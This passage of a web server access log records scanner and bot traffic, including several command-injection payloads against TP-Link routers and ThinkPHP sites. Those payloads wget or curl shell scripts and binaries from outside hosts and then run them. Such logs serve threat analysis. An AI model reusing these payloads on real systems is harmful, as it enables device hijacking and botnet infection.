23:46:44] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 179.43.190.218 - - [29/Apr/2024 00:38:08] code 404, message File not found 179.43.190.218 - - [29/Apr/2024 00:38:08] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 109.205.213.198 - - [29/Apr/2024 01:17:39] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [29/Apr/2024 01:45:04] "GET / HTTP/1.1" 200 - 45.227.254.8 - - [29/Apr/2024 01:52:43] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 45.227.254.8 - - [29/Apr/2024 01:52:43] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 87.121.69.52 - - [29/Apr/2024 02:14:02] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [29/Apr/2024 02:14:02] "CONNECT google.com:443 HTTP/1.1" 501 - 185.16.38.111 - - [29/Apr/2024 02:56:56] "GET / HTTP/1.1" 200 - 192.241.196.118 - - [29/Apr/2024 03:06:18] code 404, message File not found 192.241.196.118 - - [29/Apr/2024 03:06:18] "GET /portal/redlion HTTP/1.1" 404 - 78.153.140.177 - - [29/Apr/2024 03:47:12] code 404, message File not found 78.153.140.177 - - [29/Apr/2024 03:47:12] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [29/Apr/2024 03:47:12] code 400, message Bad request version ('ÐëÚ') 78.153.140.177 - - [29/Apr/2024 03:47:12] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03»9Û\x09Üz0æÜZÒÌÒ\x98\x13\x8c\x93ÙÇþãÙàSaLaGók[l ÐëÚ" 400 - 78.153.140.179 - - [29/Apr/2024 04:11:11] code 400, message Bad request version ('\\x00\\x9eÀ(À$À\\x14À') 78.153.140.179 - - [29/Apr/2024 04:11:11] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03\x06\x11ÃúB\x9f\x91yÈ\x884ús¾>¹\x13\x07x\x11ÝüÉ\x9dxÇÜT\x1cv&À\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 78.153.140.179 - - [29/Apr/2024 04:11:11] code 404, message File not found 78.153.140.179 - - [29/Apr/2024 04:11:11] "GET /.env HTTP/1.1" 404 - 92.118.39.120 - - [29/Apr/2024 04:17:51] code 404, message File not found 92.118.39.120 - - [29/Apr/2024 04:17:51] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/var/tmp/index1.php HTTP/1.1" 404 - 92.118.39.120 - - [29/Apr/2024 04:17:52] code 404, message File not found 92.118.39.120 - - [29/Apr/2024 04:17:52] "GET /index.php?lang=../../../../../../../../var/tmp/index1 HTTP/1.1" 404 - 92.118.39.120 - - [29/Apr/2024 04:17:53] code 404, message File not found 92.118.39.120 - - [29/Apr/2024 04:17:53] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 92.118.39.120 - - [29/Apr/2024 04:17:53] code 404, message File not found 92.118.39.120 - - [29/Apr/2024 04:17:53] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 92.118.39.120 - - [29/Apr/2024 04:17:54] code 404, message File not found 92.118.39.120 - - [29/Apr/2024 04:17:54] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=curl%20http%3a%2f%2f94.156.79.60%2fgi.sh%20%7c%20sh%20%7c%7c%20wget%20-O-%20http%3a%2f%2f94.156.79.60%2fgi.sh%20%7c%20sh%20 HTTP/1.1" 404 - 185.191.126.213 - - [29/Apr/2024 04:22:33] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [29/Apr/2024 04:50:11] "GET / HTTP/1.1" 200 - 192.241.226.36 - - [29/Apr/2024 05:04:53] code 404, message File not found 192.241.226.36 - - [29/Apr/2024 05:04:53] "GET /actuator/health HTTP/1.1" 404 - 111.243.126.216 - - [29/Apr/2024 05:45:33] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x01\\x18\\x01\\x00\\x01\\x14\\x03\\x03Æï') 111.243.126.216 - - [29/Apr/2024 05:45:33] "\x16\x03\x01\x01\x18\x01\x00\x01\x14\x03\x03Æï" 400 - 91.92.248.48 - - [29/Apr/2024 06:00:57] "GET / HTTP/1.1" 200 - 91.92.248.48 - - [29/Apr/2024 06:00:57] code 404, message File not found 91.92.248.48 - - [29/Apr/2024 06:00:57] "GET /.git/config HTTP/1.1" 404 - 103.245.236.120 - - [29/Apr/2024 06:07:29] code 404, message File not found 103.245.236.120 - - [29/Apr/2024 06:07:29] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 185.224.128.43 - - [29/Apr/2024 06:28:33] "GET / HTTP/1.1" 200 - 162.216.149.161 - - [29/Apr/2024 07:01:37] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [29/Apr/2024 07:39:03] "GET / HTTP/1.1" 200 - 203.55.81.13 - - [29/Apr/2024 07:51:59] code 404, message File not found 203.55.81.13 - - [29/Apr/2024 07:51:59] code 404, message File not found 203.55.81.13 - - [29/Apr/2024 07:51:59] "GET /api/.env HTTP/1.1" 404 - 203.55.81.13 - - [29/Apr/2024 07:51:59] "GET /.env HTTP/1.1" 404 - 34.76.158.233 - - [29/Apr/2024 08:09:58] "GET / HTTP/1.1" 200 - 45.142.182.92 - - [29/Apr/2024 08:19:44] code 404, message File not found 45.142.182.92 - - [29/Apr/2024 08:19:44] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.180.143.8 - - [29/Apr/2024 08:21:32] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [29/Apr/2024 08:25:35] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [29/Apr/2024 08:25:35] "CONNECT google.com:443 HTTP/1.1" 501 - 46.174.191.29 - - [29/Apr/2024 09:43:38] "GET / HTTP/1.0" 200 - 198.235.24.209 - - [29/Apr/2024 09:49:32] code 400, message Bad request version ('À\\x13À') 198.235.24.209 - - [29/Apr/2024 09:49:32] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03\x17râj\x8d)¢\x84\x064\x8a!:Òeñþ>.ÿ|UÚUVS)\x17Ý\x93\x0eØ I\x82ÖØU¦p\x05«\x9c\x04/\x97Á²^ç\x94xKß\x1dÝ4ç.\x17&G¿\x84±\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.209 - - [29/Apr/2024 09:49:32] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00Ê\\x01\\x00\\x00Æ\\x03\\x03') 198.235.24.209 - - [29/Apr/2024 09:49:32] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03" 400 - 84.255.193.12 - - [29/Apr/2024 10:26:12] code 404, message File not found 84.255.193.12 - - [29/Apr/2024 10:26:12] "HEAD /phpmyadmin/index.php HTTP/1.1" 404 - 109.205.213.198 - - [29/Apr/2024 10:30:47] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [29/Apr/2024 10:56:58] "GET / HTTP/1.1" 200 - 192.241.193.128 - - [29/Apr/2024 11:41:50] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 192.241.193.128 - - [29/Apr/2024 11:41:50] "MGLNDD_203.219.129.101_80" 400 - 205.210.31.222 - - [29/Apr/2024 11:55:36] "GET / HTTP/1.0" 200 - 185.16.38.111 - - [29/Apr/2024 11:56:42] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [29/Apr/2024 12:10:17] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [29/Apr/2024 12:11:29] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [29/Apr/2024 12:11:29] "CONNECT google.com:443 HTTP/1.1" 501 - 185.16.38.111 - - [29/Apr/2024 12:25:10] "GET / HTTP/1.1" 200 - 65.49.1.110 - - [29/Apr/2024 12:57:33] "GET / HTTP/1.1" 200 - 65.49.1.119 - - [29/Apr/2024 13:00:26] code 404, message File not found 65.49.1.119 - - [29/Apr/2024 13:00:26] "GET /favicon.ico HTTP/1.1" 404 - 65.49.1.120 - - [29/Apr/2024 13:01:15] code 404, message File not found 65.49.1.120 - - [29/Apr/2024 13:01:15] "GET /geoserver/web/ HTTP/1.1" 404 - 35.91.60.252 - - [29/Apr/2024 13:07:06] "GET / HTTP/1.1" 200 - 71.6.232.24 - - [29/Apr/2024 13:45:37] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [29/Apr/2024 14:40:38] "GET / HTTP/1.0" 200 - 87.121.69.52 - - [29/Apr/2024 14:40:49] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [29/Apr/2024 14:40:49] "CONNECT google.com:443 HTTP/1.1" 501 - 64.62.197.164 - - [29/Apr/2024 14:46:38] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03\\x99\\x8dªV@ü¾>a\\x19½Æ?þ\\x9d\\x94H\\x82wñuz;}¼\\xadVÄn') 64.62.197.164 - - [29/Apr/2024 14:46:38] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x99\x8dªV@ü¾>a\x19½Æ?þ\x9d\x94H\x82wñuz;}¼­VÄn" 400 - 103.149.34.5 - - [29/Apr/2024 15:48:52] "HEAD / HTTP/1.1" 200 - 103.149.34.5 - - [29/Apr/2024 15:48:53] "GET / HTTP/1.1" 200 - 103.78.215.62 - - [29/Apr/2024 15:48:54] code 404, message File not found 103.78.215.62 - - [29/Apr/2024 15:48:54] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 - 165.154.182.53 - - [29/Apr/2024 16:55:08] "GET / HTTP/1.1" 200 - 165.154.182.53 - - [29/Apr/2024 16:55:09] code 400, message Bad request version ('À\\x13À') 165.154.182.53 - - [29/Apr/2024 16:55:09] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03FMío§8äÅf[Q\x05lÕôñ Åó\x89u/­\x15Ô>\x03\x80²RôI ÅtQº_#üÅ\x85×\x96å\x07s\x18~\x1a\x9dãÎ\x15ê\x93¼\x1c\x16¹\x1fr¾ß\x9b\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 165.154.182.53 - - [29/Apr/2024 16:55:10] code 400, message Bad HTTP/0.9 request type ('t3') 165.154.182.53 - - [29/Apr/2024 16:55:10] "t3 12.1.2" 400 - 84.54.51.41 - - [29/Apr/2024 17:36:43] code 404, message File not found 84.54.51.41 - - [29/Apr/2024 17:36:43] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 146.19.24.28 - - [29/Apr/2024 17:37:53] "GET / HTTP/1.1" 200 - 152.32.235.85 - - [29/Apr/2024 17:38:51] "GET / HTTP/1.1" 200 - 46.174.191.29 - - [29/Apr/2024 18:07:33] "GET / HTTP/1.0" 200 - 185.224.128.31 - - [29/Apr/2024 19:37:13] "GET / HTTP/1.1" 200 - 185.224.128.31 - - [29/Apr/2024 20:04:02] "GET / HTTP/1.1" 200 - 206.217.128.98 - - [29/Apr/2024 20:18:00] "GET / HTTP/1.1" 200 - 107.170.229.45 - - [29/Apr/2024 20:26:27] code 404, message File not found 107.170.229.45 - - [29/Apr/2024 20:26:27] "GET /hudson HTTP/1.1" 404 - 185.180.143.136 - - [29/Apr/2024 20:28:21] "GET / HTTP/1.1" 200 - 185.180.143.136 - - [29/Apr/2024 20:28:21] code 404, message File not found 185.180.143.136 - - [29/Apr/2024 20:28:21] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 87.121.69.52 - - [29/Apr/2024 20:29:20] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [29/Apr/2024 20:29:20] "CONNECT google.com:443 HTTP/1.1" 501 - 185.180.140.6 - - [29/Apr/2024 20:29:40] "GET / HTTP/1.1" 200 - 192.241.193.55 - - [29/Apr/2024 21:15:23] code 404, message File not found 192.241.193.55 - - [29/Apr/2024 21:15:23] "GET /druid/index.html HTTP/1.1" 404 - 218.159.23.59 - - [29/Apr/2024 21:24:04] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [29/Apr/2024 21:45:03] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [29/Apr/2024 21:47:21] "GET / HTTP/1.1" 200 - 162.216.150.106 - - [29/Apr/2024 22:24:23] "GET / HTTP/1.1" 200 - 45.142.182.92 - - [29/Apr/2024 23:22:21] code 404, message File not found 45.142.182.92 - - [29/Apr/2024 23:22:21] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://179.43.190.218/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 - 207.174.26.171 - - [29/Apr/2024 23:43:41] code 400, message Bad request version ('7wýgNâ(Ú+2½%ï°\\x16Ùyí02ia·Nî\\x9de\\x94\\x8b') 207.174.26.171 - - [29/Apr/2024 23:43:41] "\x16\x03\x01\x00á\x01\x00\x00Ý\x03\x03;\x00AFéùAμ5\x14fµÑn³\x0b_\x93\x8d%Ë-¡é\x1d\x98\x8c\x8d-½à 7wýgNâ(Ú+2½%ï°\x16Ùyí02ia·Nî\x9de\x94\x8b" 400 - 117.204.207.137 - - [29/Apr/2024 23:55:24] code 501, message Unsupported method ('POST') 117.204.207.137 - - [29/Apr/2024 23:55:24] "POST /HNAP1/ HTTP/1.0" 501 - 87.236.176.233 - - [30/Apr/2024 00:10:55] "GET / HTTP/1.1" 200 - 35.203.25.143 - - [30/Apr/2024 00:13:15] code 400, message Bad request version ('4¥P') 35.203.25.143 - - [30/Apr/2024 00:13:15] "\x16\x03\x01\x00M\x01\x00\x00I\x03\x03\x83Þü\x98*I¢\x13çáP\x82\x13Z\x87+ùï\x04\x9e{4)¶ÅTà ^Ã¯Ì À´à\x7f\\N!\x07\x1f\x0fÕ­Ø\x1eÔîØ\x8e²\x854¥P" 400 - 35.203.25.143 - - [30/Apr/2024 00:13:18] code 501, message Unsupported method ('OPTIONS') 35.203.25.143 - - [30/Apr/2024 00:13:18] "OPTIONS / HTTP/1.0" 501 - 192.241.219.52 - - [30/Apr/2024 00:22:56] code 404, message File not found 192.241.219.52 - - [30/Apr/2024 00:22:56] "GET /actuator/health HTTP/1.1" 404 - 146.19.24.28 - - [30/Apr/2024 00:48:18] "GET / HTTP/1.1" 200 - 213.149.174.195 - - [30/Apr/2024 00:49:36] "GET / HTTP/1.1" 200 - 198.199.98.133 - - [30/Apr/2024 01:57:27] code 404, message File not found 198.199.98.133 - - [30/Apr/2024 01:57:27] "GET /manager/text/list HTTP/1.1" 404 - 165.227.4.24 - - [30/Apr/2024 01:59:54] code 404, message File not found 165.227.4.24 - - [30/Apr/2024 01:59:54] "GET /.env HTTP/1.1" 404 - 87.121.69.52 - - [30/Apr/2024 02:08:14] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [30/Apr/2024 02:08:14] "CONNECT google.com:443 HTTP/1.1" 501 - 122.224.248.37 - - [30/Apr/2024 02:22:24] code 404, message File not found 122.224.248.37 - - [30/Apr/2024 02:22:24] "HEAD /phpmyadmin/index.php HTTP/1.1" 404 - 185.242.226.10 - - [30/Apr/2024 02:23:10] "GET / HTTP/1.1" 200 - 203.55.81.13 - - [30/Apr/2024 02:43:10] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 02:43:10] "GET /.env HTTP/1.1" 404 - 203.55.81.13 - - [30/Apr/2024 02:43:10] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 02:43:10] "GET /api/.env HTTP/1.1" 404 - 83.97.73.245 - - [30/Apr/2024 02:48:08] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 185.224.128.43 - - [30/Apr/2024 02:48:56] "GET / HTTP/1.1" 200 - 203.55.81.13 - - [30/Apr/2024 03:21:27] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 03:21:27] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 03:21:27] "GET /.env HTTP/1.1" 404 - 203.55.81.13 - - [30/Apr/2024 03:21:27] "GET /api/.env HTTP/1.1" 404 - 107.170.224.30 - - [30/Apr/2024 03:33:46] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [30/Apr/2024 03:40:59] code 404, message File not found 83.97.73.245 - - [30/Apr/2024 03:40:59] "GET /actuator/gateway/routes HTTP/1.1" 404 - 203.55.81.13 - - [30/Apr/2024 04:59:14] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 04:59:14] code 404, message File not found 203.55.81.13 - - [30/Apr/2024 04:59:14] "GET /.env HTTP/1.1" 404 - 203.55.81.13 - - [30/Apr/2024 04:59:14] "GET /api/.env HTTP/1.1" 404 - 109.205.213.198 - - [30/Apr/2024 05:00:53] "GET / HTTP/1.1" 200 - 84.54.51.41 - - [30/Apr/2024 05:27:46] code 404, message File not found 84.54.51.41 - - [30/Apr/2024 05:27:46] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 94.156.79.228 - - [30/Apr/2024 05:29:09] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.107', 35676) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.107 - - [30/Apr/2024 05:30:30] "GET / HTTP/1.1" 200 - 167.94.145.107 - - [30/Apr/2024 05:30:34] "GET / HTTP/1.1" 200 - 167.94.145.107 - - [30/Apr/2024 05:30:35] code 505, message Invalid HTTP version (2.0) 167.94.145.107 - - [30/Apr/2024 05:30:35] "PRI * HTTP/2.0" 505 - 167.94.145.107 - - [30/Apr/2024 05:30:35] code 404, message File not found 167.94.145.107 - - [30/Apr/2024 05:30:35] "GET /favicon.ico HTTP/1.1" 404 - 102.68.79.193 - - [30/Apr/2024 05:50:48] "GET / HTTP/1.1" 200 - 103.245.236.120 - - [30/Apr/2024 06:31:13] code 404, message File not found 103.245.236.120 - - [30/Apr/2024 06:31:13] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 44.220.185.120 - - [30/Apr/2024 06:56:39] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [30/Apr/2024 07:34:11] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [30/Apr/2024 07:56:11] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [30/Apr/2024 08:53:14] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [30/Apr/2024 08:53:14] "CONNECT google.com:443 HTTP/1.1" 501 - 46.174.191.29 - - [30/Apr/2024 09:50:36] "GET / HTTP/1.0" 200 - 162.216.150.214 - - [30/Apr/2024 10:32:56] "GET / HTTP/1.1" 200 - 45.128.232.213 - - [30/Apr/2024 12:26:51] code 400, message Bad request version ('À\\x13À') 45.128.232.213 - - [30/Apr/2024 12:26:51] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03êMÞU0\x1c$\x7f"2\x01\x19G«Dö®2¦¾ÙÕ?r×z\x17Ú¶Ñ^H 9J5\x08Ø7§\x8bäÍ`´z(+uïT\x01\x9f\x1eÃ\x9f\x01ÑÓ'î¥\x97Æ\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 45.128.232.213 - - [30/Apr/2024 12:26:52] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00£\\x01\\x00\\x00\\x9f\\x03\\x03\\x16ÅsrÝ£Ï\\x81AÃCló\\x8e½!¹5-¨Ø¦ÍpZ\\x87#>\\x9e¨?¯\\x00\\x00*À+À/\\x00\\x9ę̩̪À') 45.128.232.213 - - [30/Apr/2024 12:26:52] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03\x16ÅsrÝ£Ï\x81AÃCló\x8e½!¹5-¨Ø¦ÍpZ\x87#>\x9e¨?¯\x00\x00*À+À/\x00\x9ę̩̪À" 400 - 45.128.232.213 - - [30/Apr/2024 12:27:01] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.59', 42522) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.59 - - [30/Apr/2024 12:53:10] "GET / HTTP/1.1" 200 - 118.194.250.113 - - [30/Apr/2024 13:39:00] "GET / HTTP/1.1" 200 - 118.194.250.113 - - [30/Apr/2024 13:39:00] code 404, message File not found 118.194.250.113 - - [30/Apr/2024 13:39:00] "GET /favicon.ico HTTP/1.1" 404 - 118.194.250.113 - - [30/Apr/2024 13:39:01] code 404, message File not found 118.194.250.113 - - [30/Apr/2024 13:39:01] "GET /sitemap.xml HTTP/1.1" 404 - 118.194.250.113 - - [30/Apr/2024 13:39:01] code 404, message File not found 118.194.250.113 - - [30/Apr/2024 13:39:01] "GET /robots.txt HTTP/1.1" 404 - 180.149.125.166 - - [30/Apr/2024 13:47:24] code 404, message File not found 180.149.125.166 - - [30/Apr/2024 13:47:24] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 - 185.224.128.43 - - [30/Apr/2024 13:50:17] "GET / HTTP/1.1" 200 - 198.235.24.172 - - [30/Apr/2024 14:10:58] "GET / HTTP/1.1" 200 - 94.156.79.228 - - [30/Apr/2024 14:18:14] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [30/Apr/2024 14:26:23] "GET / HTTP/1.1" 200 - 117.199.74.184 - - [30/Apr/2024 14:29:59] code 400, message Bad HTTP/0.9 request type ('27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$') 117.199.74.184 - - [30/Apr/2024 14:29:59] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 - 179.43.190.218 - - [30/Apr/2024 14:32:48] code 404, message File not found 179.43.190.218 - - [30/Apr/2024 14:32:48] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F179.43.190.218%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 65.49.20.68 - - [30/Apr/2024 15:10:38] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03óW"æØ/Ú5KËj]G¯è;˧f8ó3AxöÁµ9å}^Í\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 65.49.20.68 - - [30/Apr/2024 15:10:38] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03óW"æØ/Ú5KËj]G¯è;˧f8ó3AxöÁµ9å}^Í\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 80.94.92.60 - - [30/Apr/2024 15:27:49] code 404, message File not found 80.94.92.60 - - [30/Apr/2024 15:27:49] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3Bcd%20%2Ftmp%20%3B%20rm%20-rf%20tenda.sh%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 178.128.175.117 - - [30/Apr/2024 15:33:55] code 400, message Bad request version ('(À>½s\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 178.128.175.117 - - [30/Apr/2024 15:33:55] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03\x13@°\x12\x98ÕàYë0\x96\x05¢,\x80\x1cz$|ÎÑ\x00$\x08ãÔ\x0c(À>½s\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 195.154.220.76 - - [30/Apr/2024 16:35:35] "GET / HTTP/1.1" 200 - 102.165.89.54 - - [30/Apr/2024 16:40:46] "GET / HTTP/1.1" 200 - 78.153.140.179 - - [30/Apr/2024 17:58:18] code 404, message File not found 78.153.140.179 - - [30/Apr/2024 17:58:18] "GET /.env HTTP/1.1" 404 - 78.153.140.179 - - [30/Apr/2024 17:58:19] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x03\\x82ÄðPº¬+Ó¢ÜÓßy\\x12Q¢RÈß_·så)\\x04ÃPCÒ?×^\\x00\\x00nÀ0À,À2À.À/À+À1À-\\x00¥\\x00£\\x00¡\\x00\\x9f\\x00¤\\x00¢\\x00') 78.153.140.179 - - [30/Apr/2024 17:58:19] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03\x82ÄðPº¬+Ó¢ÜÓßy\x12Q¢RÈß_·så)\x04ÃPCÒ?×^\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 87.246.7.62 - - [30/Apr/2024 18:07:30] "GET / HTTP/1.0" 200 - 80.75.212.24 - - [30/Apr/2024 18:17:24] code 501, message Unsupported method ('CONNECT') 80.75.212.24 - - [30/Apr/2024 18:17:24] "CONNECT kaisercloud.io:443 HTTP/1.1" 501 - 185.224.128.43 - - [30/Apr/2024 19:00:46] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('162.142.125.214', 45816) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 162.142.125.214 - - [30/Apr/2024 19:07:32] "GET / HTTP/1.1" 200 - 162.142.125.214 - - [30/Apr/2024 19:07:36] "GET / HTTP/1.1" 200 - 162.142.125.214 - - [30/Apr/2024 19:07:36] code 505, message Invalid HTTP version (2.0) 162.142.125.214 - - [30/Apr/2024 19:07:36] "PRI * HTTP/2.0" 505 - 162.142.125.214 - - [30/Apr/2024 19:07:37] code 404, message File not found 162.142.125.214 - - [30/Apr/2024 19:07:37] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.241 - - [30/Apr/2024 19:36:01] "GET / HTTP/1.1" 200 - 64.62.197.229 - - [30/Apr/2024 19:37:55] code 404, message File not found 64.62.197.229 - - [30/Apr/2024 19:37:55] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.236 - - [30/Apr/2024 19:38:33] code 404, message File not found 64.62.197.236 - - [30/Apr/2024 19:38:33] "GET /geoserver/web/ HTTP/1.1" 404 - 138.197.15.3 - - [30/Apr/2024 